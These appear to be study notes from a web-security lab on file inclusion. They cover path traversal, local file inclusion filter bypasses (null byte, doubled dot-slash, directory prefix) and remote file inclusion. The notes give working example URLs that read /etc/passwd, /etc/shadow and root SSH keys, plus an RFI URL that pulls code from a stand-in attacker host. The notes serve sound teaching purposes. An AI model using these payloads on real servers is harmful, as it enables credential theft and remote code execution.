Skip to main content

File Inclusion

Introduction

  • Web application request access to files on a given system, including images, static text, and so on via parameters.
  • File inclusion vulnerabilities happen when these inputs are not properly sanitized.
  • For example: http://webapp.thm/get.php?file=userCV.pdf

Path Traversal

  • Also known as Directory traversal, a web security vulnerability allows an attacker to read operating system resources, such as local files on the server running an application.
  • The user input is passed to functions such as file_get_contents in PHP.
  • When the user input is not properly validated, the attacker can pass something like below to access resources outside the website root. 
    http://webapp.thm/get.php?file=../../../../etc/passwd
  • Depending on the os version, the attacker can also do one of the following 
    http://webapp.thm/get.php?file=../../../../boot.ini
    http://webapp.thm/get.php?file=../../../../windows/win.ini
  • Below are some common OS files you could use when testing.
    • /etc/issue - Contains a message or system identification to be printed before the login prompt.
    • /etc/profile - Controls system-wide default variables.
    • /proc/version - Specifies the version of the Linux kernel.
    • /etc/passwd - Has all registered users that have access to a system.
    • /etc/shadow - Contains information about the system's users' passwords.
    • /root/.bash_history - Contains the history commands for root user.
    • /var/log/dmessage - Contains global system messages.
    • /var/mail/root - All emails for root user.
    • /root/.ssh/id_rsa - Private SSH keys for a root or any known valid user on the server.
    • /var/log/apache2/access.log - The accessed requests for Apache web server.
    • C:\boot.ini - Contains the boot options for computers with BIOS firmware.

Local File Inclusion (LFI)

  • The functions include, require, include_once, and require_once often contribute to LFI in PHP.
  • LFI can also occcur in other languages such as ASP, JSP and even on Node js.
  • Language is fetched with http://webapp.thm/index.php?lang=EN.php using include method.

Simple LFI:

  • Language is fetched with include method. 
    <?PHP 
    include($_GET["lang"]);
    ?>
  • Exploit: http://webapp.thm/get.php?lang=/etc/passwd

LFI with Folder

  • Language is fetched from a file inside a specific folder. 
    <?PHP 
        include("languages/". $_GET['lang']); 
    ?>
  • Exploit: http://webapp.thm/index.php?lang=../../../../etc/passwd.

LFI with Folder and File Extension

  • Language is fetched from a file with extension.
  • For example: If we pass lang=EN it would be converted to EN.php.
  • Exploit: Add null byte (%00) at the end to terminate the remaining string. http://webapp.thm/index.php?lang=../../../..//etc/passwd%00.
  • Note: Enter the exploit directly into the address bar instead of the form which might encode the payload.
  • Note: Null byte %00 trick is fixed and not working with PHP 5.3.4 and above.

LFI with Keyword filter

  • Files with sensitive information such as /etc/passwd are filtered.
  • Exploit:
    • Null byte trick http://webapp.thm/index.php?lang=../../../../etc/passwd%00.
    • Current directory trick http://webapp.thm/index.php?lang=../../../../etc/passwd/..

LFI with Path Traversal Filter

  • The path traversal characters ../ is replaced with an empty string.
  • Exploit: Duplicate the characters like http://webapp.thm/index.php?lang=....//....//....//....//etc//passwd.

LFI with Defined Directory

  • The path is forced to include a specific directory
  • Exploit: Add the folder at the start of the path: http://webapp.thm/index.php?lang=languages/../../../../etc/passwd

Remote File Inclusion (RFI)

  • Remote File Inclusion (RFI) is a technique to include remote files into a vulnerable application.
  • One requirement for RFI is that the allow_url_fopen option needs to be on.
  • Risk of RFI is higher than LFI as RFIs enable attacker to gain Remote Command Execution (RCE)
  • An external server must communicate with the application server for a successful RFI attack where the attacker hosts malicious files on their server.
  • Then the malicious file is injected into the include function via HTTP requests, and the content of the malicious file executes on the vulnerable application server.
  • Example: http://webapp.thm/index.php?lang=http://attacker.thm/cmd.txt.

Steps for testing for LFI

  • Find an entry point that could be via GET, POST, COOKIE, or HTTP header values!
  • Enter a valid input to see how the web server behaves.
  • Enter invalid inputs, including special characters and common file names.
  • Don't always trust what you supply in input forms is what you intended! Use either a browser address bar or a tool such as Burpsuite.
  • Look for errors while entering invalid input to disclose the current path of the web application; if there are no errors, then trial and error might be your best option.
  • Understand the input validation and if there are any filters!
  • Try the inject a valid entry to read sensitive files.